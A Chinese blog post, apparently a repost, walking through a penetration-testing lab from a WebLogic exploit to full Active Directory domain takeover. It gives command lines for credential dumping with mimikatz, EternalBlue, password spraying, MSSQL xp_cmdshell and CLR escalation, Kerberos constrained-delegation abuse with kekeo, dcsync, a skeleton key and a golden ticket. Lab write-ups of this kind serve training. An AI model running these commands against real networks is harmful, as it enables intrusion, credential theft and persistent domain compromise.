记一次内网渗透靶场打靶

admin 2023年11月8日18:01:57记一次内网渗透靶场打靶已关闭评论25 views字数 4390阅读14分38秒阅读模式

实战

打的时候遇到不少坑win7系统需要把那两个网卡重新诊断一下,mssql过期了需要重新升级一下

https://blog.csdn.net/weixin_41883890/article/details/124224645

记一次内网渗透靶场打靶
扫描一下目标ip的详细信息

nmap -sS -Pn -A -O -sV 192.168.3.24

开放了7001端口是weblogic,是server 2012系统,

记一次内网渗透靶场打靶
知道weblogic洞不少,直接上weblogicScanner扫描一波,发现有不少可利用的洞

https://github.com/0xn0ne/weblogicScanner

记一次内网渗透靶场打靶
其实也不用扫,直接github找个利用工具

https://github.com/sp4zcmd/WeblogicExploit-GUI

本来使用上方的工具注入冰蝎内存马结果不知道为什么连不上,于是写了一个蚁剑的马(此处省略一个小时)

记一次内网渗透靶场打靶
上传cs的马后使用logonpasswords或者hashdump抓取hash

记一次内网渗透靶场打靶
尝试去cmd5解密,成功了

记一次内网渗透靶场打靶
确定机器是否在域内,发现不在

记一次内网渗透靶场打靶
在扫描一下内网网段,发现一台新的主机10.10.20.3

记一次内网渗透靶场打靶

记一次内网渗透靶场打靶

记一次内网渗透靶场打靶
发现开了445和139,pass the hash试一下很不幸失败了

记一次内网渗透靶场打靶
使用kscan来扫描一下 kscan --target 10.10.20.0/24

记一次内网渗透靶场打靶
使用fscan fscan -h 10.10.20.0/24

记一次内网渗透靶场打靶
发现10.10.20.3是win7主机并且存在永恒之蓝我们来试一下
使用msf和cs联动
创建一个监听器

记一次内网渗透靶场打靶
msf配置好32位的http监听

记一次内网渗透靶场打靶
选择我们刚创建的监听器转发即可上线

记一次内网渗透靶场打靶
msf添加好路由

记一次内网渗透靶场打靶
配置好永恒之蓝,因为不出网所以正向连接

记一次内网渗透靶场打靶
经历千辛万苦,终于成功了,他攻击的时候不要按回车,可能出问题

记一次内网渗透靶场打靶
上线之后我们需要上线cs,这里使用中转上线

记一次内网渗透靶场打靶
生成一个无阶段(stageless)的木马上传使用msf上传到win7来运行,成功上线

记一次内网渗透靶场打靶
使用net time发现存在域控 \\owa.redteam.red

记一次内网渗透靶场打靶
抓一下密码,发现了本地的明文密码和域用户密码

记一次内网渗透靶场打靶

记一次内网渗透靶场打靶
发现了另一个网段10.10.10.0/24,fscan扫描一下内网,发现10.10.10.8是域控10.10.10.18是一台sqlserver的服务器

记一次内网渗透靶场打靶
其实现阶段能干的就很多了,尝试密码喷洒哈希传递,尝试漏洞打域控,试试约束委派等等
尝试一下密码喷洒,尝试失败

powershell -exec bypass "Import-Module C:\DomainPasswordSpray.ps1; Invoke-DomainPasswordSpray -Password admin!@#45"

记一次内网渗透靶场打靶
再试试约束委派,上传一个Adfind.exe文件

```

查询配置了非约束委派的主机:

AdFind.exe -h 10.10.10.8 -u saul -up admin!@#45 -b "DC=redteam,DC=red" -f "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" cn distinguishedName

查询配置了非约束委派的用户:

AdFind.exe -h 10.10.10.8 -u saul -up admin!@#45 -b "DC=redteam,DC=red" -f "(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=524288))" cn distinguishedName

查询配置了约束委派的主机:

AdFind.exe -h 10.10.10.8 -u saul -up admin!@#45 -b "DC=redteam,DC=red" -f "(&(samAccountType=805306369)(msds-allowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegateto

查询配置了约束委派的用户:

AdFind.exe -h 10.10.10.8 -u saul -up admin!@#45 -b "DC=redteam,DC=red" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegateto
```

发现sqlserver的用户设置了约束委派,因此我们要拿下sqlserver那台主机,使用约束委派拿下域控

记一次内网渗透靶场打靶
对win7主机开启socks代理

记一次内网渗透靶场打靶

记一次内网渗透靶场打靶
nmap挂代理扫一下端口proxychains nmap -sT -Pn 10.10.10.18

记一次内网渗透靶场打靶
使用软件配置好windows的socks代理,进行弱口令扫描一下

记一次内网渗透靶场打靶
使用超级弱口令爆破成功

记一次内网渗透靶场打靶
使用SharpSQLTools来执行命令

```

开开启xp_cmdshell

.\SharpSQLTools.exe 10.10.10.18 sa sa master enable_xp_cmdshell

使用xp_cmdshell执行命令

.\SharpSQLTools.exe 10.10.10.18 sa sa master xp_cmdshell whoami
```

发现权限较低

记一次内网渗透靶场打靶
使用CLR来提权

```

安装clr组件

.\SharpSQLTools.exe 10.10.10.18 sa sa master install_clr

开启clr

.\SharpSQLTools.exe 10.10.10.18 sa sa master enable_clr

执行命令

.\SharpSQLTools.exe 10.10.10.18 sa sa master clr_efspotato whoami
```

成功为system权限

记一次内网渗透靶场打靶
proxychains msfconsole开启msf
使用use exploit/windows/mssql/mssql_clr_payload 模块来反弹shell

记一次内网渗透靶场打靶
发现还是普通权限,不过没关系我们可以上传一个cs中转的木马,使用SharpSQLTools的system权限来执行

记一次内网渗透靶场打靶
上传文件

upload '/home/kali/桌面/beacon.exe' C:\\Users\\public\\

记一次内网渗透靶场打靶
执行

记一次内网渗透靶场打靶
上线

记一次内网渗透靶场打靶
抓取密码

记一次内网渗透靶场打靶

记一次内网渗透靶场打靶
进入c盘cd c:\
使用kekeo申请TGT(kekeo申请之后会有bug导致很卡,去进程里关掉就行)

kekeo.exe "tgt::ask /user:sqlserver /domain:redteam.red /password:Server12345 /ticket:administrator.kirbi" "exit"

使用TGT获取机器ST

kekeo.exe "tgs::s4u /tgt:[email protected][email protected] /user:[email protected] /service:cifs/owa.redteam.red" "exit"

使用mimikatz导入ST2

mimikatz kerberos::ptt [email protected]@[email protected]

成功访问域控

记一次内网渗透靶场打靶
使用hash也是可以的

```

请求票据

kekeo.exe "tgt::ask /user:sqlserver-2008$ /domain:redteam.red /NTLM:6063d4e2707f0f43249c8b1655138633
" "exit"

申请administrator权限的票据

kekeo.exe "tgs::s4u /tgt:[email protected][email protected] /user:[email protected] /service:cifs/owa.redteam.red" "exit"

mimikatz

mimikatz.exe "kerberos::ptt [email protected]@[email protected]" "exit"

访问

dir \owa.redteam.red\c$
```

将木马复制到域控的c盘

copy c:\Users\Public\test.exe \\owa\c$\

由于连接上之后总是掉权限,并且计划任务不知道为什么报错,mimikatz总是需要频繁的重新导入票据,捣鼓了很久没有思路,在翻笔记时想起了,建立ipc之后 psexec 就不需要账号密码了,于是下面的命令成功执行了shell

net use \\owa
shell psexec.exe -accepteula \\owa cmd /c C:\test.exe

不知道为啥还上线了两个权限一个system一个administrator,反正是拿到权限了

记一次内网渗透靶场打靶
抓一下hash

记一次内网渗透靶场打靶
在域控执行命令导出所有用户hash

mimikatz lsadump::dcsync /domain:redteam.red /all /csv

记一次内网渗透靶场打靶
为了权限维持使用mimikatz设置一个万能密码,这样域内任意主机都可以与域控建立ipc连接,密码是mimikatz

mimikatz misc::skeleton

hashdump一下krbtgt的hash做一个黄金票据

记一次内网渗透靶场打靶
黄金票据所需条件

1、域名称
2、域的SID值
3、域的KRBTGT账号的HASH
4、伪造任意用户名

sid为whoami /all去掉最后那部分数字

记一次内网渗透靶场打靶

记一次内网渗透靶场打靶
注入成功发现可以直接访问域控

记一次内网渗透靶场打靶

其他的操作

拿域控那块其实完全没有必要这么麻烦,一个zerologon就能拿下,或者cve-2021-1675也是不错的选择
再不济也有ms14-068,生成票据使用mimikatz导入

mimikatz kerberos::ptc [email protected]

还有GPP组策略也能获得域用户 可以在win7那用

use windows/gather/credentials/gpp

再就是最开始那一块也没必要转发上线,可以frp开个socks代理进行上线
并且cs的中转也可以用msf转发cs

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http

这里记录一下根据某个路径来寻找网站根目录的命令,在有rce却不知道网站目录在哪个位置是个不错的选择

dir C:\ /s /b | find "login_WebLogic_branding.png"

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月8日18:01:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次内网渗透靶场打靶http://cn-sec.com/archives/2187920.html